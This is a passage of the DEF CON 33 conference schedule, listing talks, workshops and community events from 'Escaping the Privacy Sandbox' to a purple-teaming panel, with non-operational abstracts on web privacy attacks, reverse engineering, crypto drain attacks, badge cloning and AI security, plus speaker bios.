Title: Escaping the Privacy Sandbox with Client-Side Deanonymization Attacks
When: Friday, Aug 8, 16:30 - 17:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Google's Privacy Sandbox initiative aims to provide privacy-preserving alternatives to third-party cookies by introducing new web APIs. This talk will examine potential client-side deanonymization attacks that can compromise user privacy by exploiting vulnerabilities and misconfigurations within these APIs.

I will explore the Attribution Reporting API, detailing how debugging reports can bypass privacy mechanisms like Referrer-Policy, potentially exposing sensitive user information. I will also explain how destination hijacking, in conjunction with a side-channel attack using storage limit oracles, can be used to reconstruct browsing history, demonstrating a more complex deanonymization technique.

Additionally, I will cover vulnerabilities in the Shared Storage API, illustrating how insecure cross-site worklet code can leak data stored within Shared Storage, despite the API being deliberately designed to prevent direct data access. Real-world examples and potential attack scenarios will be discussed to highlight the practical implications of these vulnerabilities.

References:

SpeakerBio:  Eugene "spaceraccoon" Lim

Eugene Lim is a security researcher and white hat hacker. From Amazon to Zoom, he has helped secure applications from a range of vulnerabilities. His work has been featured at top conferences such as Black Hat, DEF CON, and industry publications like WIRED and The Register.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Everyday Ghidra: Practical Windows Reverse Engineering
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Reverse engineering is the process of uncovering the principles, architecture, and internal structure of a piece of software or hardware. It can be used for various purposes, such as improving compatibility, enhancing security, understanding program behaviour, and even vulnerability research. However, reverse engineering can also be challenging, especially when dealing with complex and modern Windows binaries.

That’s why you need Ghidra, a powerful and open-source software reverse engineering framework developed by the National Security Agency (NSA). Ghidra can help you perform in-depth analysis of Windows binaries, using its rich set of features and tools. Whether you want to reverse engineer malware, understand software internals, or find vulnerabilities, Ghidra can handle it and this course will guide your steps.

In this course, you will learn how to use Ghidra effectively to reverse engineer Windows binaries. While Ghidra is at the heart of our curriculum, we go far beyond a simple user manual. This course is designed to help you master Windows reverse engineering techniques by using Ghidra as your primary tool. You will start with the basics of Ghidra, such as creating projects, importing and analyzing binaries, and using Ghidra’s native tools. You will then learn how to customize Ghidra to suit your needs, such as building custom data types and configuring optimal analysis. From there, you will complete progressive labs that will teach you to apply both static and dynamic analysis techniques to dive deep into Windows application behavior using Ghidra’s Windows-specific features and scripts.

Practical Exercises: - Reverse Engineering Windows Malware - Learn to statically analyze a Windows malware sample and identify its malicious behavior. - Dynamically Debugging a Windows RPC Server - Gain insight to into Windows RPC and learn how to dynamically inspect a Windows servers with Ghidra’s Debugger - Patch Diffing and Root Cause Analysis of a Windows CVE - Learn how to use Ghidra’s Patch Diffing to compare two versions of a Windows binary and identify the changes made to fix a vulnerability and find its root cause.

SpeakerBio:  John McIntosh, Security Researcher and Lead Instructor at @clearseclabs

John McIntosh @clearbluejar is a security researcher and lead instructor @clearseclabs, a company that offers hands-on training and consulting for reverse engineering and offensive security. He is passionate about learning and sharing knowledge on topics such as binary analysis, patch diffing, and vulnerability discovery. He has created several open-source security tools and courses, which are available on his GitHub page. He regularly blogs about his research projects and experiments on his [website] (https://clearbluejar.github.io), where you can find detailed write-ups on reversing recent CVEs and building RE tooling with Ghidra. With over a decade of offensive security experience, speaking and teaching at security conferences worldwide, he is always eager to learn new things and collaborate with other security enthusiasts.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Everyday Ghidra: Practical Windows Reverse Engineering
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Reverse engineering is the process of uncovering the principles, architecture, and internal structure of a piece of software or hardware. It can be used for various purposes, such as improving compatibility, enhancing security, understanding program behaviour, and even vulnerability research. However, reverse engineering can also be challenging, especially when dealing with complex and modern Windows binaries.

That’s why you need Ghidra, a powerful and open-source software reverse engineering framework developed by the National Security Agency (NSA). Ghidra can help you perform in-depth analysis of Windows binaries, using its rich set of features and tools. Whether you want to reverse engineer malware, understand software internals, or find vulnerabilities, Ghidra can handle it and this course will guide your steps.

In this course, you will learn how to use Ghidra effectively to reverse engineer Windows binaries. While Ghidra is at the heart of our curriculum, we go far beyond a simple user manual. This course is designed to help you master Windows reverse engineering techniques by using Ghidra as your primary tool. You will start with the basics of Ghidra, such as creating projects, importing and analyzing binaries, and using Ghidra’s native tools. You will then learn how to customize Ghidra to suit your needs, such as building custom data types and configuring optimal analysis. From there, you will complete progressive labs that will teach you to apply both static and dynamic analysis techniques to dive deep into Windows application behavior using Ghidra’s Windows-specific features and scripts.

Practical Exercises: - Reverse Engineering Windows Malware - Learn to statically analyze a Windows malware sample and identify its malicious behavior. - Dynamically Debugging a Windows RPC Server - Gain insight to into Windows RPC and learn how to dynamically inspect a Windows servers with Ghidra’s Debugger - Patch Diffing and Root Cause Analysis of a Windows CVE - Learn how to use Ghidra’s Patch Diffing to compare two versions of a Windows binary and identify the changes made to fix a vulnerability and find its root cause.

SpeakerBio:  John McIntosh, Security Researcher and Lead Instructor at @clearseclabs

John McIntosh @clearbluejar is a security researcher and lead instructor @clearseclabs, a company that offers hands-on training and consulting for reverse engineering and offensive security. He is passionate about learning and sharing knowledge on topics such as binary analysis, patch diffing, and vulnerability discovery. He has created several open-source security tools and courses, which are available on his GitHub page. He regularly blogs about his research projects and experiments on his [website] (https://clearbluejar.github.io), where you can find detailed write-ups on reversing recent CVEs and building RE tooling with Ghidra. With over a decade of offensive security experience, speaking and teaching at security conferences worldwide, he is always eager to learn new things and collaborate with other security enthusiasts.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 14:00-15:50 PDT


Title: Evolution and History of Drain and Approval Attacks
When: Friday, Aug 8, 14:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall4-Communities-C101 - Map

Description:

This interactive workshop explores the history and evolution of draining attacks across major blockchains such as Ethereum, Solana, and TON. Participants will witness live demonstrations of various draining techniques, from early ERC-20 approval abuse to sophisticated token spoofing. Learn to recognize, trace, and defend against these exploits while discussing popular laundering methods and current security measures. A final group challenge will involve tracking an attacker's wallet and evaluating how to recover stolen funds.

Speakers:utvecklas,George

SpeakerBio:  utvecklas

Utvecklas is a computer scientist and privacy advocate who has integrated cryptocurrency into online businesses since 2016. Over time, cryptocurrency itself became his primary interest. Outside of work, his research specializes in exploits — whether past, ongoing, or potential.

SpeakerBio:  George

George is a cryptocurrency enthusiast who has been actively involved in the space since 2018. With a focus on crypto marketing and security, he has successfully launched multiple projects aimed at improving both user adoption and safety. George is passionate about bridging the gap between complex technologies and mainstream audiences.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 17:30-17:59 PDT


Title: Exploiting the Off-chain ecosystem in Web 3 Bug Bounty
When: Friday, Aug 8, 17:30 - 17:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

I will demonstrate how it’s possible to approach the Web3 bug bounty ecosystem just by exploiting off-chain bugs and vulnerabilities in the JavaScript ecosystem. This talk will explore the current state of this field through real-world examples I’ve reported on bug bounty platforms, which contributed to my achieving the top 10 global rank on the HackenProof platform

SpeakerBio:  Bruno "BrunoModificato" Halltari

Bruno is a security researcher with a background in Web2, specializing in client-side vulnerabilities. he has conducted extensive audits and research on topics such as popular wallets and sandbox environments. He is currently ranked in the top 10 on the HackenProof bug bounty platform worldwide and has reported vulnerabilities through HackerOne to platforms such as Zoom and MetaMask.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 16:00-16:30 PDT


Title: Exposing Infosec Frauds and Foreign Agents Behind Mercenary Spyware Disinformation
When: Saturday, Aug 9, 16:00 - 16:30 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Cthulhu
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MWV - Sunday - 16:00-16:30 PDT


Title: Exposing Infosec Frauds and Foreign Agents Behind Mercenary Spyware Disinformation
When: Sunday, Aug 10, 16:00 - 16:30 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Cthulhu
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Friday - 10:00-10:30 PDT


Title: Fear vs. Physics: Diagnosing Grid Chaos
When: Friday, Aug 8, 10:00 - 10:30 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Every time the lights go out, the speculation begins—was it cyber? Squirrels? Was it an attack? But often, the real story behind grid disturbances isn’t malicious code—it’s uncontrolled chaos, born from the physical behavior of a rapidly evolving power system. This session takes a deep dive into that chaos, exploring how subtle interactions in electric grids—like oscillations—can spiral into large-scale instability. These low-frequency oscillations are increasingly common in the bulk electric system, yet are explainable. They emerge from control design, network conditions, and energy physics—not adversarial action, and the lights going off is usually a sign the system has actually acted as it should in protecting itself from damage. Equipment failures are also spectacular, but common. Its tempting to tie big fires to bad cyber, but in reality – the failures are almost always in the planning for the event, or recovery.
We’ll dissect real-world events like the Iberian Peninsula blackout, where what looked like a grid failure may have actually revealed a quiet success: a functional blackstart scenario, where system operators re-energized the grid under extreme stress. But that nuance was lost in the noise, as media and analysts scrambled for cyber scapegoats. We’ll also explore the London transformer fire, a failure in planning for an outage, and technical scrutiny of Chinese-manufactured inverter components with alleged kill switches inserted, illustrating how physical system dynamics—often create the most dramatic disruptions. This talk fuses power system engineering, ICS cybersecurity, and operational storytelling to reframe how we interpret complex events. It’s a call to replace fear with facts—and to find meaning in the chaos, not just blame.

SpeakerBio:  Emma Stewart, INL

Dr. Emma M. Stewart, is a respected power systems specialist with expertise in power distribution, critical energy delivery, modeling and simulation, as well as operational cybersecurity. She holds a Ph.D. in Electrical Engineering and an M.Eng. degree in Electrical and Mechanical Engineering. Emma is Chief Scientist, Power Grid at INL currently and leads activities in supply chain consequence analysis for digital assurance in particular for energy storage and system level programs. Throughout her career, Dr. Stewart has made significant contributions to the field of power systems, receiving patents for innovations in power distribution systems and consequence analysis for cyber and physical events. Her responsibilities over her 20 year career have also included providing electric cooperatives with education, training, information sharing, incident support, technology integration, and R&D services in energy integration, resilience and grid planning and microgrid technologies.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Saturday - 22:30-00:30 PDT


Title: Feet Feud (Hacker Family Feud)
When: Saturday, Aug 9, 22:30 - 00:30 PDT
Where: Unknown

Description:

Feet Feud (Hacker Family Feud) is a Cybersecurity-themed Family Feud style game arranged by members of the OnlyFeet CTF team and hosted by Toeb3rius (aka Tib3rius). Both survey questions and their answers are crowd-sourced from the Cybersecurity community. Two teams (Left Foot and Right Foot) captained by Ali Diamond and John Hammond and comprised of audience members go head to head, trying to figure out the top answers to the survey questions.

Attendees can either watch the game or volunteer to play on one of the two teams. Audience participation is also encouraged if either of the two teams fails to get every answer of a survey question.

Ultimately Feet Feud is about having a laugh, watching people in the industry attempt to figure out what randomly surveyed people from the Cybersecurity community put as answers to a number of security / tech related questions.

Participant Prerequisites

Participants are chosen by team captains from the audience at the start of the show. In order to be fair, we try to select participants from all seating areas, so folks who show up later than others still have a chance to volunteer.

Pre-Qualification

None.


Return to Index    -    Add to Google    -    ics Calendar file

MHV - Friday - 15:45-16:30 PDT


Title: Fighting the Digital Blockade: A View from Taiwan
When: Friday, Aug 8, 15:45 - 16:30 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Taiwan stands on the frontlines of digital warfare under the sea. This high-profile panel, led by the Deputy Minister of Digital Affairs of Taiwan will feature a gripping discussion on the silent battles waged beneath the sea. From sabotage of undersea infrastructure to the geopolitics of cyber-resilience, panelists will recall the threats and Taiwan's efforts to defend. Don’t miss this rare opportunity to explore the technical and political dimensions of the new global dynamic -- the digital blockade.

Speakers:Deputy Minister Herming Chiueh,Jason Vogt

SpeakerBio:  Deputy Minister Herming Chiueh, Taiwan Ministry of Digital Affairs

Dr. Herming Chiueh currently serves as Deputy Minister at Taiwan’s Ministry of Digital Affairs (MODA), where he leads national efforts on digital resilience, secure communications, and critical infrastructure protection.

With a background in electrical engineering and over two decades in academia and public service, Dr. Chiueh has become a key figure in Taiwan’s cybersecurity strategy. He has overseen the deployment of multi-layered digital backup systems—including subsea cables, terrestrial fiber, and emerging LEO satellite networks—to ensure the continuity of communications during natural disasters, cyberattacks, and geopolitical disruptions.

SpeakerBio:  Jason Vogt, USNWC

Jason Vogt is an assistant professor in the Strategic and Operational Research Department, Center for Naval Warfare Studies at the United States Naval War College. Professor Vogt is a cyber warfare and wargaming expert. He has participated in the development of multiple wargames at the United States Naval War College. He previously served on active duty as an Army officer.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 14:00-17:59 PDT


Title: Fine Tune your personal LLM assistant to Secure coding
When: Friday, Aug 8, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N260 - Map

Description:

In today’s landscape, generative AI coding tools are powerful but often insecure, raising concerns for developers and organizations alike. This hands-on workshop will guide participants in building a secure coding assistant tailored to their specific security needs.

We’ll begin by exploring the security limitations of current AI coding tools and discussing why fine-tuning is critical for secure development. Participants will then create and fine-tune their own LLM-based assistants using provided examples and their own use cases. By the end of the session, each attendee will have a functioning, security-focused AI coding assistant and a clear understanding of how to improve it further.

Speakers:Or Sahar,Yariv Tal

SpeakerBio:  Or Sahar, Security Researcher

Or Sahar is a security researcher, software engineer, and cofounder of Secure From Scratch — a venture dedicated to teaching developers secure coding from the very first line of code. She has worked for many years as a developer and developer team leader, before transitioning her career path to focus on hacking, application vulnerability research and security in the context of AI. Or is currently pursuing a master's degree in computer science and lectures in several colleges.

SpeakerBio:  Yariv Tal, Security Researcher

Yariv Tal is a senior developer & security researcher, and the cofounder of Secure From Scratch - a venture dedicated to teaching developers secure coding from the very first line of code. A summa cum laude graduate from the Technion, leveraging four decades of programming expertise and years of experience in university lecturing and bootcamp mentoring, he brings a developer's perspective to the field of security. Currently, he lectures on secure coding at several colleges and the private sector, he is the leader of the owasp-untrust project and is currently pursuing a master's degree in computer science and lectures in several colleges.


Return to Index    -    Add to Google    -    ics Calendar file

MHV - Saturday - 16:00-16:30 PDT


Title: Fingerprinting Maritime NMEA2000 Networks
When: Saturday, Aug 9, 16:00 - 16:30 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Maritime vessel controls and operational technology (OT) systems are getting more complex and interconnected. With industry trends aiming to reduce crew, automate tasks, and improve efficiency, these networks are expanding in scale, intricacy, and criticality for vessel operation and maintenance. The standard controller area network (CAN) bus for maritime vessel networks, developed by the National Marine Electronics Association (NMEA), known as NMEA2000. NMEA2000 is an application layer network protocol built on the ISO11783 standard and compatible with automotive SAEJ1939, it uses unique message identifiers known as Parameter Group Number, to define the data within each communication frame. Despite its widespread use, NMEA2000 remains a relatively unexplored domain, particularly in understanding normal versus abnormal network behavior, due to the unavailability of open-source datasets. To address this gap, we constructed a NMEA2000 system consisting of five nodes: GPS/Radar, Wind Speed/Direction sensor, and Multifunction Display. Using this setup, we collected datasets to analyze system behavior and developed deterministic fingerprints for each sensor, establishing a baseline of the normal operating system. We subject the system to controlled attacks to evaluate the accuracy and effectiveness of the fingerprints. This work represents a foundational step towards enhancing security and reliability in maritime OT systems.

Speakers:Constantine Macris (TheDini),Anissa Elias

SpeakerBio:  Constantine Macris (TheDini), University of Rhode Island

Constantine Macris is a Connecticut native and pursuing a PhD at the URI. Constantine is a reserve CDR in the Navy, industry expert in OT and network security and CISO at Dispel.

SpeakerBio:  Anissa Elias, University of Rhode Island
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 14:30-15:15 PDT


Title: Firewalls Under Fire: China's 5+ year campaign to penetrate perimeter network defenses
When: Friday, Aug 8, 14:30 - 15:15 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

For more than five years, firewall vendors have been under persistent, cyclical struggle against a well-resourced and relentless China-based adversary that has expended considerable resources developing custom exploits and bespoke malware expressly for the purpose of compromising enterprise firewalls in customer environments. In this first-of-its-kind presentation, Andrew Brandt will walk attendees through the complete history of the campaign, detailing the full scope of attacks and the countermeasures one firewall vendor developed to derail the threat actors, including detail into the exploits targeting specific firewalls, and malware deployed inside the firewalls as a result of these attacks.

Fundamental to this presentation is the fact that the adversary behind this campaign has not targeted only one firewall vendor: Most of the large network security providers in the industry have been targeted multiple times, using many of the same tactics and tools. So this serves not merely as a warning to the entire security industry, but as an urgent call to the companies that make up this industry to collectively combat this ongoing problem. Because at the end of the day, we all face the same threat, and we cannot hope to withstand the tempo and volume of these attacks alone. We must work together.

References:

SpeakerBio:  Andrew "Spike" Brandt

Andrew Brandt is a former investigative journalist who switched careers to work in information security in 2007. He is an experienced malware analyst, network forensicator, and cyberattack untangler, who seeks to prevent cybercriminals from being able to victimize others. He has served as the director of threat research or as a principal researcher at several large cybersecurity companies, and currently serves on the board of World Cyber Health, the parent organization that operates the Malware Village at Defcon and other conferences. As the executive director of Elect More Hackers, he is active in cybersecurity and technology policy, and seeks to recruit likeminded folks to run for elected office. He lives in Boulder, Colorado.


Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Sunday - 12:00-12:30 PDT


Title: Firmware Decryption: For, and By, the Cryptographically Illiterate
When: Sunday, Aug 10, 12:00 - 12:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

It's no secret that embedded devices are rife with security bugs just waiting to be found. However, vendors increasingly encrypt their firmware to prevent analysis by researchers, professionals, and inquisitive minds. In this talk, we examine common encryption techniques in real-world devices and how to crack the code—with or without hardware.

SpeakerBio:  Craig Heffner, Senior Staff Enigneer at NetRise
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 12:00-12:45 PDT


Title: FLARE-VM
When: Friday, Aug 8, 12:00 - 12:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

Interested in malware analysis, reverse engineering, or offensive security? You know setting up a dedicated Windows analysis virtual machine is crucial, but manually installing and configuring countless tools is incredibly time-consuming and complex. Attend this 30-minute demo to discover FLARE-VM, the powerful open-source solution from Mandiant (now part of Google Cloud) that automates this entire process. See firsthand how FLARE-VM drastically simplifies the creation of a comprehensive analysis VM packed with essential reversing and malware analysis tools. Learn why having a ready-to-go analysis environment is indispensable for so many technical cybersecurity roles and how FLARE-VM jump-starts your build!

Speakers:Joshua "jstrosch" Stroschein,Elliot Chernofsky

SpeakerBio:  Joshua "jstrosch" Stroschein, Google

Joshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.

SpeakerBio:  Elliot Chernofsky

Elliot is a senior reverse engineer on Mandiant's FLARE team. Prior to joining the team, he worked as a software reverse engineer and vulnerability researcher for the Department of Defense. He received his master’s in computer science from Georgia Tech and a bachelor’s in electrical engineering from the University of South Florida. Outside of work he enjoys hiking, ping pong, and searching for the strongest coffee on the planet.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 12:00-12:45 PDT


Title: FLARE-VM
When: Saturday, Aug 9, 12:00 - 12:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

Interested in malware analysis, reverse engineering, or offensive security? You know setting up a dedicated Windows analysis virtual machine is crucial, but manually installing and configuring countless tools is incredibly time-consuming and complex. Attend this 30-minute demo to discover FLARE-VM, the powerful open-source solution from Mandiant (now part of Google Cloud) that automates this entire process. See firsthand how FLARE-VM drastically simplifies the creation of a comprehensive analysis VM packed with essential reversing and malware analysis tools. Learn why having a ready-to-go analysis environment is indispensable for so many technical cybersecurity roles and how FLARE-VM jump-starts your build!

Speakers:Joshua "jstrosch" Stroschein,Elliot Chernofsky

SpeakerBio:  Joshua "jstrosch" Stroschein, Google

Joshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.

SpeakerBio:  Elliot Chernofsky

Elliot is a senior reverse engineer on Mandiant's FLARE team. Prior to joining the team, he worked as a software reverse engineer and vulnerability researcher for the Department of Defense. He received his master’s in computer science from Georgia Tech and a bachelor’s in electrical engineering from the University of South Florida. Outside of work he enjoys hiking, ping pong, and searching for the strongest coffee on the planet.


Return to Index    -    Add to Google    -    ics Calendar file

PSV - Friday - 12:00-12:59 PDT


Title: Flipping Locks - Remote Badge Cloning with the Flipper Zero and More
When: Friday, Aug 8, 12:00 - 12:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Traditional RFID badge cloning methods require you to be within 3 feet of your target. So how can you conduct a physical penetration test and clone a badge without interacting with a person? Companies have increasingly adopted a hybrid work environment, allowing employees to work remotely, which has decreased the amount of foot traffic in and out of a building at any given time. This session discusses two accessible, entry-level hardware designs you can build in a day and deploy in the field, along with the tried-and-true social engineering techniques that can increase your chances of remotely cloning an RFID badge.

Langston and Dan discuss their Red Team adventures using implant devices, a Flipper Zero and an iCopy-X. As a bonus the two will explain how to perform a stealthy HID iClass SE/SEOS downgrade and legacy attack! This presentation is supplemented with files and instructions that are available for download in order to build your own standalone gooseneck reader, wall implant and clipboard cloning devices!

Speakers:Langston Clements,Dan Goga

SpeakerBio:  Langston Clements

Langston grew up reading stories about the 90’s hacker escapades, and after years of observing the scene, he jumped into the cybersecurity field and never looked back. He is currently a Senior Red Team operator for Brown Brothers Harriman. With over fifteen (15) years of public and private sector experience in cybersecurity and ethical hacking, he aims to provide organizations with valuable and actionable information to help improve their security posture. Langston’s specializations focus on modern-day social engineering techniques, wireless and RFID attacks, vulnerability analysis, and physical penetration testing.

SpeakerBio:  Dan Goga

Dan Goga serves as a Principal Consultant with NRI focused on conducting penetration testing and vulnerability assessments. Dan Goga has eight years of information security experience in the public, private, and academic sectors. Dan has extensive knowledge and experience with RFID hacking, phishing techniques, social engineering techniques, and penetration testing.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 09:00-12:59 PDT


Title: Fortifying AI: Hands-On Training in Adversarial Attacks and Defense of AI Systems
When: Saturday, Aug 9, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N252 - Map

Description:

As AI becomes integral to critical systems, its vulnerabilities to adversarial attacks and data-related weaknesses pose serious risks. This interactive, one-day training is designed for AI practitioners, researchers, and security professionals to understand and mitigate these challenges. Participants will gain a comprehensive foundation in AI security, exploring adversarial attack techniques, defense mechanisms, and best practices for building robust datasets.

Speakers:Vishal "Vish" Thakur,John "Jlo" Lopes

SpeakerBio:  Vishal "Vish" Thakur

Vishal Thakur is a seasoned expert in the information security industry, with extensive experience in hands-on technical roles specializing in Incident Response, Emerging Threats, Malware Analysis, and Research. Over the years, Vishal has developed a strong reputation for his deep technical expertise and ability to address complex security challenges.

He has shared his research and insights at prominent international conferences, including BlackHat, DEFCON, FIRST, and the SANS DFIR Summit, where his sessions have been highly regarded for their depth and practical relevance. Additionally, Vishal has delivered training and workshops at BlackHat and the FIRST Conference, equipping participants with cutting-edge skills and techniques. Vishal currently leads the Incident Response function for APAC region at Atlassian.

SpeakerBio:  John "Jlo" Lopes

John Lopes is a passionate information security professional with specialist knowledge in digital forensics and incident response (DFIR), cyber threat intelligence and offensive security practices. He has over 20 years industry experience with a proven ability to help organisations defend and protect against cyber threats. John is a member of Institute of Electronic and Electrical Engineers (IEEE), International Information System Security Certification Consortium Inc. (ISC2) and a member of the Information Systems Audit and Control Association (ISACA).  John has worked in  roles as a part of the Global Incident Response Teams at Salesforce and AWS.


Return to Index    -    Add to Google    -    ics Calendar file

HRV - Sunday - 11:00-12:59 PDT


Title: Free Ham Radio Exams
When: Sunday, Aug 10, 11:00 - 12:59 PDT
Where: LVCCWest-Level3-W320 - Map

Description:

The Ham Radio Village is excited to return to DEF CON 33, offering you the opportunity "Access Everything" by gaining you access to the airwaves though free amateur radio license exams! Ham radio has a long history with ham radio operators being considered the original electronic hackers, innovating long before computers, integrated circuits, or even transistors were invented. The Ham Radio Village keeps this spirit alive by providing free ham radio license exams at DEF CON.

In today's world, wireless communication is essential. A fundamental understanding of radio technology is more important than ever. Earning your amateur radio license opens the door to the world of amateur radio, providing you with valuable knowledge of radio frequency (RF) technology. This knowledge can be applied to a wide range of other RF-related topics, including RFID credentials, Wi-Fi, and other wireless communication systems.


Return to Index    -    Add to Google    -    ics Calendar file

HRV - Saturday - 11:00-16:59 PDT


Title: Free Ham Radio Exams
When: Saturday, Aug 9, 11:00 - 16:59 PDT
Where: LVCCWest-Level3-W320 - Map

Description:

The Ham Radio Village is excited to return to DEF CON 33, offering you the opportunity "Access Everything" by gaining you access to the airwaves though free amateur radio license exams! Ham radio has a long history with ham radio operators being considered the original electronic hackers, innovating long before computers, integrated circuits, or even transistors were invented. The Ham Radio Village keeps this spirit alive by providing free ham radio license exams at DEF CON.

In today's world, wireless communication is essential. A fundamental understanding of radio technology is more important than ever. Earning your amateur radio license opens the door to the world of amateur radio, providing you with valuable knowledge of radio frequency (RF) technology. This knowledge can be applied to a wide range of other RF-related topics, including RFID credentials, Wi-Fi, and other wireless communication systems.


Return to Index    -    Add to Google    -    ics Calendar file

HRV - Friday - 13:00-15:59 PDT


Title: Free Ham Radio Exams
When: Friday, Aug 8, 13:00 - 15:59 PDT
Where: LVCCWest-Level3-W320 - Map

Description:

The Ham Radio Village is excited to return to DEF CON 33, offering you the opportunity "Access Everything" by gaining you access to the airwaves though free amateur radio license exams! Ham radio has a long history with ham radio operators being considered the original electronic hackers, innovating long before computers, integrated circuits, or even transistors were invented. The Ham Radio Village keeps this spirit alive by providing free ham radio license exams at DEF CON.

In today's world, wireless communication is essential. A fundamental understanding of radio technology is more important than ever. Earning your amateur radio license opens the door to the world of amateur radio, providing you with valuable knowledge of radio frequency (RF) technology. This knowledge can be applied to a wide range of other RF-related topics, including RFID credentials, Wi-Fi, and other wireless communication systems.


Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Saturday - 11:00-11:59 PDT


Title: Frida for reverse engineering payment applications
When: Saturday, Aug 9, 11:00 - 11:59 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:
SpeakerBio:  Ileana Barrionuevo
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PGE - Thursday - 12:00-12:59 PDT


Title: Friends of Bill W
When: Thursday, Aug 7, 12:00 - 12:59 PDT
Where: LVCCWest-Level3-W301 - Map

Description:

We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Thursday - 17:00-17:59 PDT


Title: Friends of Bill W
When: Thursday, Aug 7, 17:00 - 17:59 PDT
Where: LVCCWest-Level3-W301 - Map

Description:

We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 12:00-12:59 PDT


Title: Friends of Bill W
When: Friday, Aug 8, 12:00 - 12:59 PDT
Where: LVCCWest-Level3-W301 - Map

Description:

We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 17:00-17:59 PDT


Title: Friends of Bill W
When: Friday, Aug 8, 17:00 - 17:59 PDT
Where: LVCCWest-Level3-W301 - Map

Description:

We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 12:00-12:59 PDT


Title: Friends of Bill W
When: Saturday, Aug 9, 12:00 - 12:59 PDT
Where: LVCCWest-Level3-W301 - Map

Description:

We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 17:00-17:59 PDT


Title: Friends of Bill W
When: Saturday, Aug 9, 17:00 - 17:59 PDT
Where: LVCCWest-Level3-W301 - Map

Description:

We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Sunday - 12:00-12:59 PDT


Title: Friends of Bill W
When: Sunday, Aug 10, 12:00 - 12:59 PDT
Where: LVCCWest-Level3-W301 - Map

Description:

We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Friday - 11:00-11:45 PDT


Title: From adversarial to aligned, redefining purple teaming for maximum impact
When: Friday, Aug 8, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

Purple teaming is no longer just about red meets blue, it is about shared intelligence, continuous collaboration, and realistic adversary emulation. In this panel, we explore how modern security teams are moving from siloed operations to unified strategies that reflect how real attackers operate. By rethinking purple teaming as a proactive, intelligence-driven discipline, organizations can uncover detection gaps, improve response times, and drive measurable improvements in their defenses. Join us as we unpack how aligning offensive and defensive teams unlocks the full potential of purple teaming and leads to lasting security impact.

Speakers:Adam Pennington,Sydney Marrone,Lauren Proehl

